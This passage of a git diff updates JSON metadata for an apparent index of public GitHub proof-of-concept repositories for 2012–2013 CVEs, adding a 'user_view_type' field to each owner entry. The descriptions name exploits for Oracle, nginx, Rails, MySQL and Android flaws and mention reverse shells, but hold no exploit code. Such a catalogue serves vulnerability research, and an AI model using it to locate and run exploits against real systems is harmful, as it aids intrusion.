"https:\/\/avatars.githubusercontent.com\/u\/58800445?v=4", - "html_url": "https:\/\/github.com\/Shadow-Spinner" + "html_url": "https:\/\/github.com\/Shadow-Spinner", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Shadow-Spinner\/CVE-2012-2982_python", "description": null, @@ -375,7 +387,8 @@ "login": "elliotosama", "id": 168604968, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/168604968?v=4", - "html_url": "https:\/\/github.com\/elliotosama" + "html_url": "https:\/\/github.com\/elliotosama", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/elliotosama\/CVE-2012-2982", "description": null, diff --git a/2012/CVE-2012-3137.json b/2012/CVE-2012-3137.json index b5065ba73f..d65cdb81ea 100644 --- a/2012/CVE-2012-3137.json +++ b/2012/CVE-2012-3137.json @@ -7,7 +7,8 @@ "login": "hantwister", "id": 1304167, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1304167?v=4", - "html_url": "https:\/\/github.com\/hantwister" + "html_url": "https:\/\/github.com\/hantwister", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/hantwister\/o5logon-fetch", "description": "Attempts to exploit CVE-2012-3137 on vulnerable Oracle servers", @@ -37,7 +38,8 @@ "login": "r1-", "id": 3379185, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3379185?v=4", - "html_url": "https:\/\/github.com\/r1-" + "html_url": "https:\/\/github.com\/r1-", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/r1-\/cve-2012-3137", "description": "Exploit for cve-2012-3137 Oracle challenge", diff --git a/2012/CVE-2012-3153.json b/2012/CVE-2012-3153.json index 96160eecec..c52570a344 100644 --- a/2012/CVE-2012-3153.json +++ b/2012/CVE-2012-3153.json @@ -7,7 +7,8 @@ "login": "Mekanismen", "id": 6065905, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6065905?v=4", - "html_url": "https:\/\/github.com\/Mekanismen" + "html_url": "https:\/\/github.com\/Mekanismen", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Mekanismen\/pwnacle-fusion", "description": "Automated exploit for CVE-2012-3153 \/ CVE-2012-3152", diff --git a/2012/CVE-2012-3716.json b/2012/CVE-2012-3716.json index 23d7aac6a0..be43937734 100644 --- a/2012/CVE-2012-3716.json +++ b/2012/CVE-2012-3716.json @@ -7,7 +7,8 @@ "login": "d4rkcat", "id": 5111270, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5111270?v=4", - "html_url": "https:\/\/github.com\/d4rkcat" + "html_url": "https:\/\/github.com\/d4rkcat", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/d4rkcat\/killosx", "description": "use the Apple CoreText exploit (CVE-2012-3716) and launch an AP to affect all devices within wifi range", diff --git a/2012/CVE-2012-4220.json b/2012/CVE-2012-4220.json index f38a7f37b7..a55c619031 100644 --- a/2012/CVE-2012-4220.json +++ b/2012/CVE-2012-4220.json @@ -7,7 +7,8 @@ "login": "hiikezoe", "id": 188175, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/188175?v=4", - "html_url": "https:\/\/github.com\/hiikezoe" + "html_url": "https:\/\/github.com\/hiikezoe", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/hiikezoe\/diaggetroot", "description": "Obtain root access through CVE-2012-4220", @@ -37,7 +38,8 @@ "login": "poliva", "id": 1238981, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1238981?v=4", - "html_url": "https:\/\/github.com\/poliva" + "html_url": "https:\/\/github.com\/poliva", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/poliva\/root-zte-open", "description": "exploit for CVE-2012-4220 working on zte-open", diff --git a/2012/CVE-2012-4431.json b/2012/CVE-2012-4431.json index 6f7da93eb1..3e10d86797 100644 --- a/2012/CVE-2012-4431.json +++ b/2012/CVE-2012-4431.json @@ -7,7 +7,8 @@ "login": "imjdl", "id": 31382943, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31382943?v=4", - "html_url": "https:\/\/github.com\/imjdl" + "html_url": "https:\/\/github.com\/imjdl", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/imjdl\/CVE-2012-4431", "description": null, diff --git a/2012/CVE-2012-4681.json b/2012/CVE-2012-4681.json index 18dfef9673..af3e447a0c 100644 --- a/2012/CVE-2012-4681.json +++ b/2012/CVE-2012-4681.json @@ -7,7 +7,8 @@ "login": "benjholla", "id": 797245, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/797245?v=4", - "html_url": "https:\/\/github.com\/benjholla" + "html_url": "https:\/\/github.com\/benjholla", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/benjholla\/CVE-2012-4681-Armoring", "description": "An A\/V evasion armoring experiment for CVE-2012-4681", @@ -37,7 +38,8 @@ "login": "ZH3FENG", "id": 20502660, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20502660?v=4", - "html_url": "https:\/\/github.com\/ZH3FENG" + "html_url": "https:\/\/github.com\/ZH3FENG", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/ZH3FENG\/PoCs-CVE_2012_4681", "description": "A Simple PoC for CVE-2012-4681", diff --git a/2012/CVE-2012-4792.json b/2012/CVE-2012-4792.json index 5eafc0036d..f756a7d1cf 100644 --- a/2012/CVE-2012-4792.json +++ b/2012/CVE-2012-4792.json @@ -7,7 +7,8 @@ "login": "WizardVan", "id": 7245104, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7245104?v=4", - "html_url": "https:\/\/github.com\/WizardVan" + "html_url": "https:\/\/github.com\/WizardVan", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/WizardVan\/CVE-2012-4792", "description": "CVE-2012-4792 simple calc exploitation", diff --git a/2012/CVE-2012-4869.json b/2012/CVE-2012-4869.json index 540e171877..5d34ad17ff 100644 --- a/2012/CVE-2012-4869.json +++ b/2012/CVE-2012-4869.json @@ -7,7 +7,8 @@ "login": "bitc0de", "id": 3879848, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3879848?v=4", - "html_url": "https:\/\/github.com\/bitc0de" + "html_url": "https:\/\/github.com\/bitc0de", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/bitc0de\/Elastix-Remote-Code-Execution", "description": "Exploit for Elastix 2.2.0 and FreePBX 2.10.0 based on CVE-2012-4869 vulnerability working on Python3", @@ -37,7 +38,8 @@ "login": "0xConstant", "id": 51972282, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51972282?v=4", - "html_url": "https:\/\/github.com\/0xConstant" + "html_url": "https:\/\/github.com\/0xConstant", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/0xConstant\/CVE-2012-4869", "description": null, diff --git a/2012/CVE-2012-4929.json b/2012/CVE-2012-4929.json index d3cafe4bad..85c7f96454 100644 --- a/2012/CVE-2012-4929.json +++ b/2012/CVE-2012-4929.json @@ -7,7 +7,8 @@ "login": "mpgn", "id": 5891788, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5891788?v=4", - "html_url": "https:\/\/github.com\/mpgn" + "html_url": "https:\/\/github.com\/mpgn", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/mpgn\/CRIME-poc", "description": ":hocho: CRIME attack PoC : a compression oracle attacks CVE-2012-4929 :hocho:", @@ -41,7 +42,8 @@ "login": "anthophilee", "id": 75995332, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75995332?v=4", - "html_url": "https:\/\/github.com\/anthophilee" + "html_url": "https:\/\/github.com\/anthophilee", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/anthophilee\/A2SV--SSL-VUL-Scan", "description": "A2SV = Auto Scanning to SSL Vulnerability HeartBleed, CCS Injection, SSLv3 POODLE, FREAK... etc Support Vulnerability [CVE-2007-1858] Anonymous Cipher [CVE-2012-4929] CRIME(SPDY) [CVE-2014-0160] CCS Injection [CVE-2014-0224] HeartBleed [CVE-2014-3566] SSLv3 POODLE [CVE-2015-0204] FREAK Attack [CVE-2015-4000] LOGJAM Attack [CVE-2016-0800] SSLv2 DROWN Installation : $ apt update && apt upgrade $ apt install git $ apt install python2 $ apt install python $ git clone https:\/\/github.com\/hahwul\/ a2sv $ cd a2sv $ chmod +x * $ pip2 install -r requirements.txt usage : $ python2 a2sv.py -h It shows all commands how we can use this tool $ python a2sv.py -t 127.0.0.1 127.0.0.1 = target means here own device", diff --git a/2012/CVE-2012-5106.json b/2012/CVE-2012-5106.json index 22102a5f9c..d3a773c869 100644 --- a/2012/CVE-2012-5106.json +++ b/2012/CVE-2012-5106.json @@ -7,7 +7,8 @@ "login": "war4uthor", "id": 45926018, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45926018?v=4", - "html_url": "https:\/\/github.com\/war4uthor" + "html_url": "https:\/\/github.com\/war4uthor", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/war4uthor\/CVE-2012-5106", "description": "CVE-2012-5106 - Freefloat FTP Server Buffer Overflow Vulnerability. Tested on Windows XP Professional SP3.", diff --git a/2012/CVE-2012-5321.json b/2012/CVE-2012-5321.json index 8a6f340582..84c67431b5 100644 --- a/2012/CVE-2012-5321.json +++ b/2012/CVE-2012-5321.json @@ -7,7 +7,8 @@ "login": "Cappricio-Securities", "id": 102907425, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102907425?v=4", - "html_url": "https:\/\/github.com\/Cappricio-Securities" + "html_url": "https:\/\/github.com\/Cappricio-Securities", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Cappricio-Securities\/CVE-2012-5321", "description": "TikiWiki CMS Groupware v8.3 - Open Redirect", diff --git a/2012/CVE-2012-5519.json b/2012/CVE-2012-5519.json index 4f71ae82f3..798a7dd470 100644 --- a/2012/CVE-2012-5519.json +++ b/2012/CVE-2012-5519.json @@ -7,7 +7,8 @@ "login": "p1ckzi", "id": 44880203, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44880203?v=4", - "html_url": "https:\/\/github.com\/p1ckzi" + "html_url": "https:\/\/github.com\/p1ckzi", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/p1ckzi\/CVE-2012-5519", "description": "cups-root-file-read.sh | CVE-2012-5519", diff --git a/2012/CVE-2012-5575.json b/2012/CVE-2012-5575.json index b607744e4d..b5812a31b0 100644 --- a/2012/CVE-2012-5575.json +++ b/2012/CVE-2012-5575.json @@ -7,7 +7,8 @@ "login": "tafamace", "id": 45160113, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45160113?v=4", - "html_url": "https:\/\/github.com\/tafamace" + "html_url": "https:\/\/github.com\/tafamace", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/tafamace\/CVE-2012-5575", "description": null, diff --git a/2012/CVE-2012-5613.json b/2012/CVE-2012-5613.json index 0a692f5994..3814beb425 100644 --- a/2012/CVE-2012-5613.json +++ b/2012/CVE-2012-5613.json @@ -7,7 +7,8 @@ "login": "Hood3dRob1n", "id": 1881344, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1881344?v=4", - "html_url": "https:\/\/github.com\/Hood3dRob1n" + "html_url": "https:\/\/github.com\/Hood3dRob1n", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Hood3dRob1n\/MySQL-Fu.rb", "description": "MySQL-Fu is a Ruby based MySQL Client Script I wrote. It does most of the stuff a normal MySQL client might do: SQL Shell, Update\/Delete\/Drop Database\/Table, Add\/Delete Users, Dump Database(s)\/Table w\/ option for gzip...... Plus a few extra options to make life a little easier for pentests. Includes Several builtin PHP Command Shell options as well as Pentestmonkey's PHP Reverse Shell, in addition to multiple options for file writing and reading (all files read logged locally for offline analysis later), also includes Ruby port of Kingcope's CVE-2012-5613 Linux MySQL Privilege Escalation Exploit.", @@ -37,7 +38,8 @@ "login": "w4fz5uck5", "id": 32375656, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32375656?v=4", - "html_url": "https:\/\/github.com\/w4fz5uck5" + "html_url": "https:\/\/github.com\/w4fz5uck5", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/w4fz5uck5\/UDFPwn-CVE-2012-5613", "description": "MySQL 4.x\/5.0 (Linux) - User-Defined Function (UDF) Dynamic Library (2) automation script.", diff --git a/2012/CVE-2012-5664.json b/2012/CVE-2012-5664.json index fac45b54dc..5c2bd7f8de 100644 --- a/2012/CVE-2012-5664.json +++ b/2012/CVE-2012-5664.json @@ -7,7 +7,8 @@ "login": "phusion", "id": 830588, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/830588?v=4", - "html_url": "https:\/\/github.com\/phusion" + "html_url": "https:\/\/github.com\/phusion", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/phusion\/rails-cve-2012-5664-test", "description": "Demo app showing how the Rails CVE-2013-5664 vulnerability works.", diff --git a/2012/CVE-2012-5958.json b/2012/CVE-2012-5958.json index 25c883c27e..6a50c81926 100644 --- a/2012/CVE-2012-5958.json +++ b/2012/CVE-2012-5958.json @@ -7,7 +7,8 @@ "login": "lochiiconnectivity", "id": 4155305, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4155305?v=4", - "html_url": "https:\/\/github.com\/lochiiconnectivity" + "html_url": "https:\/\/github.com\/lochiiconnectivity", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/lochiiconnectivity\/vulnupnp", "description": "Discover uPNP devices vulnerable to CVE-2013-0229 \/ CVE-2013-0230 \/ CVE-2012-5958 \/ CVE-2012-5959", diff --git a/2012/CVE-2012-5960.json b/2012/CVE-2012-5960.json index b962aaff58..551e5222b9 100644 --- a/2012/CVE-2012-5960.json +++ b/2012/CVE-2012-5960.json @@ -7,7 +7,8 @@ "login": "finn79426", "id": 26408530, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26408530?v=4", - "html_url": "https:\/\/github.com\/finn79426" + "html_url": "https:\/\/github.com\/finn79426", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/finn79426\/CVE-2012-5960-PoC", "description": "CVE-2012-5960, CVE-2012-5959 Proof of Concept", diff --git a/2012/CVE-2012-6066.json b/2012/CVE-2012-6066.json index 8bd1c93515..4916f44fd1 100644 --- a/2012/CVE-2012-6066.json +++ b/2012/CVE-2012-6066.json @@ -7,7 +7,8 @@ "login": "bongbongco", "id": 3170006, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3170006?v=4", - "html_url": "https:\/\/github.com\/bongbongco" + "html_url": "https:\/\/github.com\/bongbongco", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/bongbongco\/CVE-2012-6066", "description": "FreeSSHD Remote Authentication Bypass Vulnerability (freeSSHd 2.1.3)", diff --git a/2012/CVE-2012-6636.json b/2012/CVE-2012-6636.json index c6be1805d1..d7dc6ee5a3 100644 --- a/2012/CVE-2012-6636.json +++ b/2012/CVE-2012-6636.json @@ -7,7 +7,8 @@ "login": "xckevin", "id": 5159879, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5159879?v=4", - "html_url": "https:\/\/github.com\/xckevin" + "html_url": "https:\/\/github.com\/xckevin", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/xckevin\/AndroidWebviewInjectDemo", "description": "An app demo for test android webview security issue: CVE-2012-6636", @@ -41,7 +42,8 @@ "login": "Snip3R69", "id": 76834257, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76834257?v=4", - "html_url": "https:\/\/github.com\/Snip3R69" + "html_url": "https:\/\/github.com\/Snip3R69", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Snip3R69\/CVE-2013-4710-WebView-RCE-Vulnerability", "description": "Android 3.0 through 4.1.x on Disney Mobile, eAccess, KDDI, NTT DOCOMO, SoftBank, and other devices does not properly implement the WebView class, which allows remote attackers to execute arbitrary methods of Java objects or cause a denial of service (reboot) via a crafted web page, as demonstrated by use of the WebView.addJavascriptInterface method, a related issue to CVE-2012-6636.", diff --git a/2013/CVE-2013-0156.json b/2013/CVE-2013-0156.json index e369aa1e4a..bffbe23d2f 100644 --- a/2013/CVE-2013-0156.json +++ b/2013/CVE-2013-0156.json @@ -7,7 +7,8 @@ "login": "terracatta", "id": 315873, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/315873?v=4", - "html_url": "https:\/\/github.com\/terracatta" + "html_url": "https:\/\/github.com\/terracatta", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/terracatta\/name_reverser", "description": "Silly Rails App to demonstrate vuln CVE-2013-0156", @@ -37,7 +38,8 @@ "login": "heroku", "id": 23211, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23211?v=4", - "html_url": "https:\/\/github.com\/heroku" + "html_url": "https:\/\/github.com\/heroku", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/heroku\/heroku-CVE-2013-0156", "description": "Inspect all of your heroku apps to see if they are running a vulnerable version of Rails", @@ -67,7 +69,8 @@ "login": "josal", "id": 88265, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88265?v=4", - "html_url": "https:\/\/github.com\/josal" + "html_url": "https:\/\/github.com\/josal", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/josal\/crack-0.1.8-fixed", "description": "crack repo from jnunemaker but with version 0.1.8 and rails CVE-2013-0156 vulnerability fixed", @@ -97,7 +100,8 @@ "login": "bsodmike", "id": 368260, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/368260?v=4", - "html_url": "https:\/\/github.com\/bsodmike" + "html_url": "https:\/\/github.com\/bsodmike", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/bsodmike\/rails-exploit-cve-2013-0156", "description": "Bootstrapped Rails 3.2.10 to test the remote code exploit CVE-2013-0156", @@ -127,7 +131,8 @@ "login": "R3dKn33-zz", "id": 31809058, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31809058?v=4", - "html_url": "https:\/\/github.com\/R3dKn33-zz" + "html_url": "https:\/\/github.com\/R3dKn33-zz", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/R3dKn33-zz\/CVE-2013-0156", "description": "Arbitrary deserialization that can be used to trigger SQL injection and even Code execution", @@ -157,7 +162,8 @@ "login": "Jjdt12", "id": 140899832, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/140899832?v=4", - "html_url": "https:\/\/github.com\/Jjdt12" + "html_url": "https:\/\/github.com\/Jjdt12", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Jjdt12\/kuang_grade_mk11", "description": "Pseudo shell for CVE-2013-0156. ", diff --git a/2013/CVE-2013-0212.json b/2013/CVE-2013-0212.json index c27d97c411..ac04d816c3 100644 --- a/2013/CVE-2013-0212.json +++ b/2013/CVE-2013-0212.json @@ -7,7 +7,8 @@ "login": "LogSec", "id": 81561547, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/81561547?v=4", - "html_url": "https:\/\/github.com\/LogSec" + "html_url": "https:\/\/github.com\/LogSec", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/LogSec\/CVE-2013-0212", "description": null, diff --git a/2013/CVE-2013-0229.json b/2013/CVE-2013-0229.json index 25c883c27e..6a50c81926 100644 --- a/2013/CVE-2013-0229.json +++ b/2013/CVE-2013-0229.json @@ -7,7 +7,8 @@ "login": "lochiiconnectivity", "id": 4155305, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4155305?v=4", - "html_url": "https:\/\/github.com\/lochiiconnectivity" + "html_url": "https:\/\/github.com\/lochiiconnectivity", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/lochiiconnectivity\/vulnupnp", "description": "Discover uPNP devices vulnerable to CVE-2013-0229 \/ CVE-2013-0230 \/ CVE-2012-5958 \/ CVE-2012-5959", diff --git a/2013/CVE-2013-0269.json b/2013/CVE-2013-0269.json index 093e0e7ba3..0c32c2f45b 100644 --- a/2013/CVE-2013-0269.json +++ b/2013/CVE-2013-0269.json @@ -7,7 +7,8 @@ "login": "heroku", "id": 23211, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23211?v=4", - "html_url": "https:\/\/github.com\/heroku" + "html_url": "https:\/\/github.com\/heroku", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/heroku\/heroku-CVE-2013-0269", "description": "Inspect all of your Heroku apps for vulnerable versions of the JSON gem", @@ -37,7 +38,8 @@ "login": "danring", "id": 52101, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52101?v=4", - "html_url": "https:\/\/github.com\/danring" + "html_url": "https:\/\/github.com\/danring", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/danring\/heroku-CVE-2013-0269", "description": "Inspect all of your Heroku apps for vulnerable versions of the JSON gem", diff --git a/2013/CVE-2013-0303.json b/2013/CVE-2013-0303.json index e09d51e2b9..0411722a73 100644 --- a/2013/CVE-2013-0303.json +++ b/2013/CVE-2013-0303.json @@ -7,7 +7,8 @@ "login": "CiscoCXSecurity", "id": 66816759, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/66816759?v=4", - "html_url": "https:\/\/github.com\/CiscoCXSecurity" + "html_url": "https:\/\/github.com\/CiscoCXSecurity", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/CiscoCXSecurity\/ownCloud_RCE_CVE-2013-0303", "description": "ownCloud PoC for CVE-2013-0303", diff --git a/2013/CVE-2013-0333.json b/2013/CVE-2013-0333.json index 4498482154..08dd186ed3 100644 --- a/2013/CVE-2013-0333.json +++ b/2013/CVE-2013-0333.json @@ -7,7 +7,8 @@ "login": "heroku", "id": 23211, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23211?v=4", - "html_url": "https:\/\/github.com\/heroku" + "html_url": "https:\/\/github.com\/heroku", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/heroku\/heroku-CVE-2013-0333", "description": null, diff --git a/2013/CVE-2013-1081.json b/2013/CVE-2013-1081.json index f642414c6c..282e18031a 100644 --- a/2013/CVE-2013-1081.json +++ b/2013/CVE-2013-1081.json @@ -7,7 +7,8 @@ "login": "steponequit", "id": 1279201, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1279201?v=4", - "html_url": "https:\/\/github.com\/steponequit" + "html_url": "https:\/\/github.com\/steponequit", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/steponequit\/CVE-2013-1081", "description": "Novell ZENworks Mobile Management - LFI RCE", diff --git a/2013/CVE-2013-1300.json b/2013/CVE-2013-1300.json index d2ae04d839..6a20122133 100644 --- a/2013/CVE-2013-1300.json +++ b/2013/CVE-2013-1300.json @@ -7,7 +7,8 @@ "login": "Meatballs1", "id": 1854557, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1854557?v=4", - "html_url": "https:\/\/github.com\/Meatballs1" + "html_url": "https:\/\/github.com\/Meatballs1", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Meatballs1\/cve-2013-1300", "description": null, diff --git a/2013/CVE-2013-1488.json b/2013/CVE-2013-1488.json index 59f4468047..100d3db1f6 100644 --- a/2013/CVE-2013-1488.json +++ b/2013/CVE-2013-1488.json @@ -7,7 +7,8 @@ "login": "v-p-b", "id": 540246, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/540246?v=4", - "html_url": "https:\/\/github.com\/v-p-b" + "html_url": "https:\/\/github.com\/v-p-b", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/v-p-b\/buherablog-cve-2013-1488", "description": "PoC Java exploit based on http:\/\/www.contextis.com\/research\/blog\/java-pwn2own\/", diff --git a/2013/CVE-2013-1491.json b/2013/CVE-2013-1491.json index d7b5435f9b..5c6cca3ff4 100644 --- a/2013/CVE-2013-1491.json +++ b/2013/CVE-2013-1491.json @@ -7,7 +7,8 @@ "login": "guhe120", "id": 5601255, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5601255?v=4", - "html_url": "https:\/\/github.com\/guhe120" + "html_url": "https:\/\/github.com\/guhe120", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/guhe120\/CVE20131491-JIT", "description": "JIT spray version of cve-2013-1491", diff --git a/2013/CVE-2013-1690.json b/2013/CVE-2013-1690.json index 0833ba9dd2..c4aae62324 100644 --- a/2013/CVE-2013-1690.json +++ b/2013/CVE-2013-1690.json @@ -7,7 +7,8 @@ "login": "vlad902", "id": 1088893, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1088893?v=4", - "html_url": "https:\/\/github.com\/vlad902" + "html_url": "https:\/\/github.com\/vlad902", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/vlad902\/annotated-fbi-tbb-exploit", "description": "Annotated FBI exploit for the Tor Browser Bundle from mid-2013 (CVE-2013-1690)", diff --git a/2013/CVE-2013-1763.json b/2013/CVE-2013-1763.json index ba6ef28a6c..f718ae1f3c 100644 --- a/2013/CVE-2013-1763.json +++ b/2013/CVE-2013-1763.json @@ -7,7 +7,8 @@ "login": "qkrtjsrbs315", "id": 47624693, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47624693?v=4", - "html_url": "https:\/\/github.com\/qkrtjsrbs315" + "html_url": "https:\/\/github.com\/qkrtjsrbs315", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/qkrtjsrbs315\/CVE-2013-1763", "description": null, diff --git a/2013/CVE-2013-1775.json b/2013/CVE-2013-1775.json index 900e6fd7d8..d705678fca 100644 --- a/2013/CVE-2013-1775.json +++ b/2013/CVE-2013-1775.json @@ -7,7 +7,8 @@ "login": "bekhzod0725", "id": 17560738, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17560738?v=4", - "html_url": "https:\/\/github.com\/bekhzod0725" + "html_url": "https:\/\/github.com\/bekhzod0725", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/bekhzod0725\/perl-CVE-2013-1775", "description": "CVE-2013-1775 Exploit written in Perl", diff --git a/2013/CVE-2013-1965.json b/2013/CVE-2013-1965.json index 4fdbe2a1eb..ec122d85d7 100644 --- a/2013/CVE-2013-1965.json +++ b/2013/CVE-2013-1965.json @@ -7,7 +7,8 @@ "login": "cinno", "id": 11706497, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11706497?v=4", - "html_url": "https:\/\/github.com\/cinno" + "html_url": "https:\/\/github.com\/cinno", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/cinno\/CVE-2013-1965", "description": "A proof of concept exploit for the CVE-2013-1965 vulnerability affecting Apache Struts 2", diff --git a/2013/CVE-2013-2006.json b/2013/CVE-2013-2006.json index 279dca6a7c..46a81f1144 100644 --- a/2013/CVE-2013-2006.json +++ b/2013/CVE-2013-2006.json @@ -7,7 +7,8 @@ "login": "LogSec", "id": 81561547, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/81561547?v=4", - "html_url": "https:\/\/github.com\/LogSec" + "html_url": "https:\/\/github.com\/LogSec", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/LogSec\/CVE-2013-2006", "description": null, diff --git a/2013/CVE-2013-2028.json b/2013/CVE-2013-2028.json index 0771d67018..6ae70500b8 100644 --- a/2013/CVE-2013-2028.json +++ b/2013/CVE-2013-2028.json @@ -7,7 +7,8 @@ "login": "danghvu", "id": 1152714, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1152714?v=4", - "html_url": "https:\/\/github.com\/danghvu" + "html_url": "https:\/\/github.com\/danghvu", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/danghvu\/nginx-1.4.0", "description": "For the analysis of CVE-2013-2028", @@ -37,7 +38,8 @@ "login": "kitctf", "id": 8018062, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8018062?v=4", - "html_url": "https:\/\/github.com\/kitctf" + "html_url": "https:\/\/github.com\/kitctf", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/kitctf\/nginxpwn", "description": "Exploitation Training -- CVE-2013-2028: Nginx Stack Based Buffer Overflow", @@ -67,7 +69,8 @@ "login": "tachibana51", "id": 29031994, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/29031994?v=4", - "html_url": "https:\/\/github.com\/tachibana51" + "html_url": "https:\/\/github.com\/tachibana51", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/tachibana51\/CVE-2013-2028-x64-bypass-ssp-and-pie-PoC", "description": "this is not stable", @@ -97,7 +100,8 @@ "login": "m4drat", "id": 39669467, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39669467?v=4", - "html_url": "https:\/\/github.com\/m4drat" + "html_url": "https:\/\/github.com\/m4drat", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/m4drat\/CVE-2013-2028-Exploit", "description": "CVE-2013-2028 python exploit", @@ -132,7 +136,8 @@ "login": "jptr218", "id": 84092766, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/84092766?v=4", - "html_url": "https:\/\/github.com\/jptr218" + "html_url": "https:\/\/github.com\/jptr218", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/jptr218\/nginxhack", "description": "A CVE-2013-2028 implementation", @@ -162,7 +167,8 @@ "login": "Sunqiz", "id": 59192636, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59192636?v=4", - "html_url": "https:\/\/github.com\/Sunqiz" + "html_url": "https:\/\/github.com\/Sunqiz", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Sunqiz\/CVE-2013-2028-reproduction", "description": "CVE-2013-2028复现", @@ -192,7 +198,8 @@ "login": "xiw1ll", "id": 69167284, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/69167284?v=4", - "html_url": "https:\/\/github.com\/xiw1ll" + "html_url": "https:\/\/github.com\/xiw1ll", + "user_view_type": "public" }, "html_url": 